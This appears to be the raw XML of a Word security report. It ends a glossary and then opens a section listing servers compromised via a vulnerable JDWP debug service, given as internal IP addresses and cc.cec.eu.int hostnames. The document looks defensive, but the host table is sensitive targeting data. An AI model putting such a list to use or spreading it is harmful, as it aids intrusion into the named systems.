                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Remote Management </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="125E11AE" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44F648F7" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3759FD7A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Management Instrumentation </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="6875BD0A" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3DD90A51" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A6D918D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Subsystem for Linux </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2C6DBCB0" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07E21B47" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>XAMPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="083D22D3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cross (X) Platform Apache, MySQL (now replaced by MariaDB), PHP and PERL web server platform solution stack package</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="26DF9D0F" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="08EC8315" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="746D799E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Extensible Markup Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="06B8F37F" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B990943" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>XSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="69052DBF" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Extensible Stylesheet Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="122FC0C4" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="00621353" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ZIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4D8C15DE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ZIP is an archive file format, zip means “at high speed” </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="221" w:name="_Toc212654674"/>
    <w:bookmarkStart w:id="222" w:name="_Toc213253581"/>
    <w:p w14:paraId="5EC7507E" w14:textId="74E018AF" w:rsidR="00012B64" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00012B64">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-490873102"/>
          <w:placeholder>
            <w:docPart w:val="B78E9CB8205742F38AF546E215FFD504"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:bookmarkStart w:id="223" w:name="_Toc198044936"/>
          <w:r w:rsidR="00012B64" w:rsidRPr="001019D3">
            <w:t>Vulnerable Targets Lists</w:t>
          </w:r>
          <w:bookmarkEnd w:id="223"/>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="221"/>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="1F67D847" w14:textId="2534C1A2" w:rsidR="00012B64" w:rsidRPr="001019D3" w:rsidRDefault="00012B64" w:rsidP="00012B64">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_Toc198044937"/>
      <w:bookmarkStart w:id="225" w:name="_Ref198126663"/>
      <w:bookmarkStart w:id="226" w:name="_Ref207896129"/>
      <w:bookmarkStart w:id="227" w:name="_Toc212654675"/>
      <w:bookmarkStart w:id="228" w:name="_Ref212817406"/>
      <w:bookmarkStart w:id="229" w:name="_Ref212824044"/>
      <w:bookmarkStart w:id="230" w:name="_Toc213253582"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Servers compromised via </w:t>
      </w:r>
      <w:r w:rsidR="00F5296D" w:rsidRPr="001019D3">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>ulnerable JDWP service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
      <w:bookmarkEnd w:id="225"/>
      <w:bookmarkEnd w:id="226"/>
      <w:bookmarkEnd w:id="227"/>
      <w:bookmarkEnd w:id="228"/>
      <w:bookmarkEnd w:id="229"/>
      <w:bookmarkEnd w:id="2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7"/>
        <w:gridCol w:w="2272"/>
        <w:gridCol w:w="818"/>
        <w:gridCol w:w="1550"/>
        <w:gridCol w:w="2603"/>
      </w:tblGrid>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="22E6C00B" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="340"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38D8E813" w14:textId="604C2C78" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="009C7798">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61DCA446" w14:textId="7C2BD6B5" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="009C7798">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="639DF093" w14:textId="59E2F23B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="009C7798">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="887" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37FB61C2" w14:textId="266AA08C" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="009C7798">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C236B5A" w14:textId="10B62D7A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="009C7798">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="76BD3041" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1DEB4A38" w14:textId="4FBB299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10.200.9.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18A80CE2" w14:textId="744BE05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wlslb19140.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="09EE146F" w14:textId="7273A40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D8E4C22" w14:textId="3D232FD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Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7B8F75F5" w14:textId="5E35186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56F28A67" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="013F09AF" w14:textId="5A3695E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10.200.9.72</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AD34CF4" w14:textId="668B18B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wlslb19139.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4D0ED48A" w14:textId="5968EEF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0DD42816" w14:textId="0D929FF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Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D4F98FA" w14:textId="799385C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1861FBAB" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="78F7403D" w14:textId="7B21FD9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10.200.9.41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72698A4D" w14:textId="6A6327B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wlslb19137.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="109B153C" w14:textId="29A48A1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2345EAE4" w14:textId="4CFC92D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Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="174D9AF9" w14:textId="68132E5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63AAFEB5" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0082EE17" w14:textId="620B2E1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10.200.9.43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69BE6C52" w14:textId="406868A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wlslb19138.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5E1E521E" w14:textId="28537B9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85A83BF" w14:textId="288A565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Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="093115CF" w14:textId="5402BF4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7CDA4D32" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7744B4F9" w14:textId="61F3780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10.130.181.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68833A98" w14:textId="39F496A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wlstd03815.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7AF271EA" w14:textId="25B814E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0F09DC93" w14:textId="4C4129E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vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E80CB7B" w14:textId="4F7667F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ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="4912AB1A" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1C67DD0F" w14:textId="5450785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10.130.176.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="214C653A" w14:textId="21DFA91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wlstd03088.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="70FBA4D4" w14:textId="2207011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9720D52" w14:textId="420911C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vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E49C001" w14:textId="451708C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5C6D1D17" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0A58F592" w14:textId="2E2471C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10.130.141.34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C8204C2" w14:textId="5798574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wlstd01776.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="79416AE2" w14:textId="01C0BB8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31EB5CF" w14:textId="00EF594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vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0999AA67" w14:textId="7410F3F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78DFB015" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2F1CE93D" w14:textId="472CA0A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10.130.181.240</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA1D93F" w14:textId="11D18D0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wlstd04192.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="05021571" w14:textId="59E6CF0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98D1201" w14:textId="5DAE5BB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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5003CB88" w14:textId="2394C96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48E39395" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6330E044" w14:textId="161CE31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10.130.138.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B1E2C8" w14:textId="032CA7E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wlstd02308.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7B48A3EA" w14:textId="06A241F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668EFCF0" w14:textId="3BFD30D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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35DFDB83" w14:textId="5F401E2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52B355D6" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="74C4DEC8" w14:textId="6D40C5D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10.130.134.110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BABB675" w14:textId="65186AC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wlstd04204.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
